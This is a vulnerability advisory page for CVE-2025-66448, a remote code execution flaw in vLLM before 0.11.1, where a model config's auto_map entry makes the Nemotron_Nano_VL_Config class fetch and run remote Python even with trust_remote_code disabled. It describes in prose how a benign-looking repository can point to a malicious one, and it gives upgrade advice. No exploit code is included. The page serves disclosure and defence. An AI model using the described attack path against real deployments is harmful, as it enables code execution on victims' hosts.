CVE-2025-66448
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-12-01

Last updated on: 2025-12-03

Assigner: GitHub, Inc.

Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-12-01
Last Modified
2025-12-03
Generated
2026-05-07
AI Q&A
2025-12-02
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 2 associated CPEs
Vendor Product Version / Range
vllm vllm 0.11.1
vllm vllm to 0.11.1 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-94 The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability in vLLM (prior to version 0.11.1) involves a critical remote code execution issue in the Nemotron_Nano_VL_Config class. When vLLM loads a model configuration containing an auto_map entry, it dynamically fetches and executes Python code from a remote repository specified in that entry. This happens even if the user sets trust_remote_code to False, allowing an attacker to trick the system into running malicious code by publishing a frontend repository whose config points to a malicious backend repository. This leads to silent execution of attacker-controlled code on the victim's machine.


How can this vulnerability impact me? :

This vulnerability can allow an attacker to execute arbitrary code remotely on your system with limited privileges. This can lead to compromise of confidentiality, integrity, and availability of your system and data, including potential data theft, system manipulation, or denial of service.


What immediate steps should I take to mitigate this vulnerability?

Upgrade vLLM to version 0.11.1 or later, as this version contains the fix for the critical remote code execution vulnerability. Avoid loading model configs that contain untrusted auto_map entries or explicitly ensure that trust_remote_code is set to False, although prior to 0.11.1 this setting does not prevent exploitation.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart